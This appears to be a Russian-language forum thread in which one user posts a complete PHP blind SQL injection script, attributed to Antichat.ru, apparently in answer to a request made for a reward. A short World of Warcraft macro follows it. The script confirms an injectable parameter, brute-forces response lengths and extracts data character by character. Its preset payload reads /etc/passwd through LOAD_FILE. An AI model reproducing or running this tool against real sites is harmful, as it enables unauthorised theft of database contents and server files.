|
|
Модератор форума: No_MaTTeR, Dimitro, LightInDarkness |
Форум » Полезное » Флудилка » блайнд скрипт. (за вознаграждение) |
блайнд скрипт. |
Icewar93web,
Код <?php set_time_limit(0); error_reporting(E_ALL); ini_set('display_errors','On'); define('HeaderArray', 'HeaderArray', true); echo "################################################## ############################## # Copyright (c) 2012 XAMEHA # # Antichat.ru # # # #Usage: php FileName.php \\ # #1. \"http://host:port/path/index2.php?Get-Parm\" \\ # #2. \"Post-Data\" \\ # #3. \"SQL\" \\ # #4. \"SQL-Return\" \\, Example: \"qwertyuiopasdfghjklzxcvbnm\" # # Or is it easier to set all the required variables in the PHP-File # ################################################## ##############################\n\n"; ///* $argv[1] = 'http://127.0.0.1:80/index.php'; $argv[2] = 'fid=(7)and({BoolInjVar})+--+'; $argv[3] = 'LOAD_FILE(\'/etc/passwd\')'; $argv[4] = "qwertyuiopasdfghjklzxcvbnm-0123456789.:\r\n"; $argv[5] = '1'; //*/ !isset($argv[1]) && exit; !isset($argv[2]) && ($argv[2]=false); class BlindSQL { private $path = ''; protected $len = array(128); private $RetStr = ''; public $TestSQL = array( 'good' => '1=1', 'bad' => '1=0' ); public $parm = array( 'post' => false ); /*Функция переобразования ответа в true или false*/ private function ToBool($ret) { $RetVar = false; unset($ret[0]); foreach ($ret as $value) if ('content-disposition' === strtolower(str_replace('_', '-', substr($value, 0, 19)))) { $RetVar = true; break; } return $RetVar; } /*Функция отправки запроса*/ private function SendRequest($TypeRequest, $InjVar) { switch($TypeRequest) { case 'HeaderArray': /*Устанавливаем переменные*/ $path = str_replace('{BoolInjVar}', $InjVar, $this->path); $post_parm = ($this->parm->post===false)?false:(str_replace('{BoolInjVar}', $InjVar, $this->parm->post)); /*Выполняем запрос*/ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $this->path); curl_setopt($ch, CURLOPT_ENCODING, 'gzip,deflate'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; rv:9.0.1) Gecko/20100101 Firefox/9.0.1'); curl_setopt($ch, CURLOPT_HEADER, true); if ($post_parm !== false) { curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $post_parm); } //curl_setopt($ch, CURLOPT_VERBOSE, 1);//Поробное протоколирование запроса //curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8888");//Прокси $out = curl_exec($ch); $err = (object)array( 'No' => curl_errno($ch), 'Str' => curl_error($ch) ); curl_close($ch); if($err->No !== 0) die("\nError, {$err->No}: {$err->str}\n\n"); return $this->ToBool(array_map( function ($str) { return trim($str, "\r\n "); }, explode("\n", $out) )); break; } return null; } public function StartInjecting ($type, $sql, $mask, $len = 0) { $this->sql = $sql; switch($type) { case 'HeaderArray': /*Тестируем корректность MySQL*/ $Good = $this->SendRequest(HeaderArray, $this->TestSQL['good']); $Bad = $this->SendRequest(HeaderArray, $this->TestSQL['bad']); if(!($Good===true && $Bad===false)) die("This injection does not behave correctly in a standard request!\n"); /*Начинаем брутфорсить длину*/ $len = end($this->len); $this->len = array(); $module = 0; while(true) { $RetBool = $this->SendRequest(HeaderArray, "length(({$this->sql}))<=".($len+$module)); $this->len[count($this->len)] = (object)array('len' => ($len+$module), 'ret' => $RetBool); $module = ($RetBool!==true)?($module+$len):($module); $len = ($RetBool!==true)?($len*2):$len/2; echo '+'; if(!is_int($module+$len)) { echo "\nLength: ".($this->len = $this->len[count($this->len)-1]->len)."\n\n"; break; } } unset($len, $module, $RetBool, $Good, $Bad); /*Начинаем побирать строку*/ /*Формируем массив*/ $this->BinaryInterval = array_map( function ($chr) { return (int)ord($chr); }, str_split($mask)); sort($this->BinaryInterval); /**/ $this->RetStr = str_repeat('*', $this->len); for($i=0;$i<$this->len;++$i) $this->RetStr{$i} = chr($this->BinaryIntervalFind($i+1, $this->BinaryInterval, true)); /*Выводим строку*/ return "\n\nString: {$this->RetStr}\n"; break; } } private function BinaryIntervalFind($NumChar, $BinInterval, $view) { $BinInterval = array_chunk($BinInterval, ceil(count($BinInterval)/2)); $BinInterval = ($this->SendRequest(HeaderArray, "ord(mid(({$this->sql}),{$NumChar},1))<=".(end($BinInterval[0]))))?$BinInterval[0]:$BinInterval[1]; if(count($BinInterval) === 1) { $RetBool = ($this->SendRequest(HeaderArray, "ord(mid(({$this->sql}),{$NumChar},1))=".(reset($BinInterval)))); $a = $RetBool?reset($BinInterval):false; if($view === true) echo $a?chr($a):'*'; return reset($BinInterval); } return $this->BinaryIntervalFind($NumChar, $BinInterval, $view); } function __construct($path, $post) { $this->parm = (object)$this->parm; $this->path = $path; $this->parm->post = $post; } } $BindObj = new BlindSQL(trim((string)$argv[1], ' "\'`'), $argv[2]); $BindObj->StartInjecting(HeaderArray, $argv[3], $argv[4], (int)$argv[5]); echo "\n";
Сообщение # 2 написано 13.03.2014 в 13:30
|
Icewar93web
Код #show Ослепление /run if not UnitDebuff("target", "Подлый трюк") and not UnitDebuff("target", "Ошеломление") and not UnitDebuff("target", "Удар по почкам") and not UnitDebuff("target", "Парализующий удар") then RunMacroText("/cast Ослепление") end
Сообщение # 4 написано 13.03.2014 в 20:33
|
| |||
| |||